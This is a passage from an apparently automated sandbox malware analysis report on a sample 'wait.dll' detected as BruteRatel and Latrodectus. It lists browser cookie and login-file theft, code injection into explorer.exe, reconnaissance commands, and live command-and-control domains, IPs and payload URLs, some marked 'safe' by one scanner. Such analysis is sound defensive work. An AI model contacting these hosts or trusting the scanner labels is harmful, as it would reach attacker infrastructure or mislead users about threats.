            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\CookiesJump to behavior

            Remote Access Functionality

            barindex
            Yara detected BruteRatel
            Source: Yara matchFile source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR
            Yara detected Latrodectus
            Source: Yara matchFile source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		131
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		2
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		2
            Obfuscated Files or Information            		1
            Credentials In Files            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Service Execution            		1
            Windows Service            		1
            Access Token Manipulation            		1
            DLL Side-Loading            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Windows Service            		1
            Masquerading            		NTDS128
            System Information Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script913
            Process Injection            		1
            Valid Accounts            		LSA Secrets1
            Query Registry            		SSHKeylogging114
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation            		Cached Domain Credentials191
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
            Virtualization/Sandbox Evasion            		DCSync121
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job913
            Process Injection            		Proc Filesystem13
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Rundll32            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging21
            System Network Configuration Discovery            		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566852 Sample: wait.dll.exe Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 63 vutarf.com 2->63 65 reateberam.com 2->65 67 3 other IPs or domains 2->67 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Antivirus detection for URL or domain 2->81 83 6 other signatures 2->83 11 loaddll64.exe 1 2->11         started        signatures3 process4 process5 13 rundll32.exe 12 11->13         started        17 cmd.exe 1 11->17         started        19 rundll32.exe 12 11->19         started        21 conhost.exe 11->21         started        dnsIp6 75 vutarf.com 94.232.43.224, 49713, 49740, 49761 WELLWEBNL Russian Federation 13->75 103 Contains functionality to inject threads in other processes 13->103 105 Injects code into the Windows Explorer (explorer.exe) 13->105 107 Sets debug register (to hijack the execution of another thread) 13->107 123 3 other signatures 13->123 23 explorer.exe 98 10 13->23 injected 109 Uses net.exe to modify the status of services 17->109 111 Uses ipconfig to lookup or modify the Windows network settings 17->111 113 Uses whoami command line tool to query computer and username 17->113 115 Performs a network lookup / discovery via net view 17->115 27 rundll32.exe 12 17->27         started        117 System process connects to network (likely due to code injection or exploit) 19->117 119 Writes to foreign memory regions 19->119 121 Allocates memory in foreign processes 19->121 signatures7 process8 dnsIp9 69 dogirafer.com 104.21.68.89, 443, 49972, 49980 CLOUDFLARENETUS United States 23->69 71 reateberam.com 172.67.217.190, 443, 49907, 49916 CLOUDFLARENETUS United States 23->71 87 System process connects to network (likely due to code injection or exploit) 23->87 89 Checks if browser processes are running 23->89 91 Contains functionality to steal Internet Explorer form passwords 23->91 93 Tries to harvest and steal browser information (history, passwords, etc) 23->93 29 cmd.exe 1 23->29         started        31 cmd.exe 23->31         started        34 cmd.exe 23->34         started        36 8 other processes 23->36 73 huanvn.com 103.57.249.207, 49704, 49705, 49706 SITINETWORS-IN-APSITINETWORKSLIMITEDIN India 27->73 95 Injects code into the Windows Explorer (explorer.exe) 27->95 97 Writes to foreign memory regions 27->97 99 Allocates memory in foreign processes 27->99 101 3 other signatures 27->101 signatures10 process11 signatures12 38 systeminfo.exe 2 1 29->38         started        41 conhost.exe 29->41         started        125 Performs a network lookup / discovery via net view 31->125 43 conhost.exe 31->43         started        45 net.exe 31->45         started        53 2 other processes 34->53 127 Uses whoami command line tool to query computer and username 36->127 47 net.exe 36->47         started        49 net.exe 36->49         started        51 conhost.exe 36->51         started        55 13 other processes 36->55 process13 signatures14 85 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 38->85 57 WmiPrvSE.exe 38->57         started        59 net1.exe 47->59         started        61 net1.exe 49->61         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            wait.dll.dll0%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54100%Avira URL Cloudmalware
            https://dogirafer.com/test/a0%Avira URL Cloudsafe
            https://reateberam.com/test/100%Avira URL Cloudmalware
            https://reateberam.com/test/4560D100%Avira URL Cloudmalware
            http://r11.o.lencr.org00%Avira URL Cloudsafe
            https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767100%Avira URL Cloudmalware
            https://huanvn.com:6542/gop.php6)0%Avira URL Cloudsafe
            https://huanvn.com/0%Avira URL Cloudsafe
            https://reateberam.com/test/t60G100%Avira URL Cloudmalware
            https://huanvn.com:6542/gop.phpK0%Avira URL Cloudsafe
            https://reateberam.com/test/X100%Avira URL Cloudmalware
            https://vutarf.com/0%Avira URL Cloudsafe
            https://reateberam.com/100%Avira URL Cloudmalware
            https://dogirafer.com/m0%Avira URL Cloudsafe
            https://dogirafer.com/test/0%Avira URL Cloudsafe
            https://reateberam.com/test/w100%Avira URL Cloudmalware
            https://huanvn.com:6542/gop.php50%Avira URL Cloudsafe
            https://dogirafer.com/0%Avira URL Cloudsafe
            http://x1.i.lew0%Avira URL Cloudsafe
            https://huanvn.com:6542/stop.php0%Avira URL Cloudsafe
            https://vutarf.com/%0%Avira URL Cloudsafe
            https://huanvn.com/~C0%Avira URL Cloudsafe
            https://dogirafer.com/test/N#e0%Avira URL Cloudsafe
            https://dogirafer.com/Z#q0%Avira URL Cloudsafe
            https://reateberam.com/files/stkm.bino100%Avira URL Cloudmalware
            https://reateberam.com/q100%Avira URL Cloudmalware
            https://reateberam.com/files/stkm.bin100%Avira URL Cloudmalware
            https://dogirafer.com/3405117-2476756634-10030%Avira URL Cloudsafe
            https://huanvn.com:6542/gop.php0%Avira URL Cloudsafe
            https://huanvn.com:6542/gop.phpn)?0%Avira URL Cloudsafe
            https://vutarf.com:6542/stop.php0%Avira URL Cloudsafe
            https://dogirafer.com/test/ys0%Avira URL Cloudsafe
            https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50100%Avira URL Cloudmalware
            https://reateberam.com/test/4560100%Avira URL Cloudmalware
            https://dogirafer.com/.50%Avira URL Cloudsafe
            https://reateberam.com/files/stkm.binSL100%Avira URL Cloudmalware
            https://vutarf.com:6542/stop.phpo0%Avira URL Cloudsafe
            http://r10.o.lencr.o0%Avira URL Cloudsafe
            https://dogirafer.com/test/E0%Avira URL Cloudsafe
            https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19100%Avira URL Cloudmalware
            https://dogirafer.com/uo0%Avira URL Cloudsafe
            https://vutarf.com/W0%Avira URL Cloudsafe
            https://reateberam.com/p100%Avira URL Cloudmalware
            https://vutarf.com:6542/stop.phpu0%Avira URL Cloudsafe
            https://vutarf.com:6542/gop.php0%Avira URL Cloudsafe
            https://huanvn.com/P0%Avira URL Cloudsafe
            https://huanvn.com/Q0%Avira URL Cloudsafe
            https://dogirafer.com/eo0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.214.172
            		truefalse
              		high
              vutarf.com
              		94.232.43.224
              		truetrue
                		unknown
                reateberam.com
                		172.67.217.190
                		truetrue
                  		unknown
                  huanvn.com
                  		103.57.249.207
                  		truetrue
                    		unknown
                    dogirafer.com
                    		104.21.68.89
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://reateberam.com/test/true
                      • Avira URL Cloud: malware
                      		unknown
                      https://dogirafer.com/test/true
                      • Avira URL Cloud: safe
                      		unknown
                      https://reateberam.com/files/stkm.bintrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://word.office.comonexplorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://r11.o.lencr.org0rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://powerpoint.office.comcemberexplorer.exe, 00000008.00000000.2325776934.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4553248554.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://dogirafer.com/test/aexplorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reateberam.com/test/4560Dexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://huanvn.com:6542/gop.php6)rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://huanvn.com/rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reateberam.com/test/t60Gexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://excel.office.comexplorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103624134.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://huanvn.com:6542/gop.phpKrundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.microexplorer.exe, 00000008.00000000.2322979543.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2322953274.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4547057338.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                              		high
                              https://reateberam.com/test/Xexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://vutarf.com/rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://reateberam.com/explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://x1.i.lewrundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://dogirafer.com/mexplorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://x1.c.lencr.org/0rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://x1.i.lencr.org/0rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2325776934.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://dogirafer.com/explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554853307.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://huanvn.com:6542/stop.phprundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://reateberam.com/test/wexplorer.exe, 00000008.00000003.3863706304.0000000003532000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://huanvn.com:6542/gop.php5rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://vutarf.com/%rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://wns.windows.com/)sexplorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://dogirafer.com/Z#qexplorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://dogirafer.com/test/N#eexplorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://huanvn.com/~Crundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://reateberam.com/files/stkm.binoexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://r11.o.lencr.org0#rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, 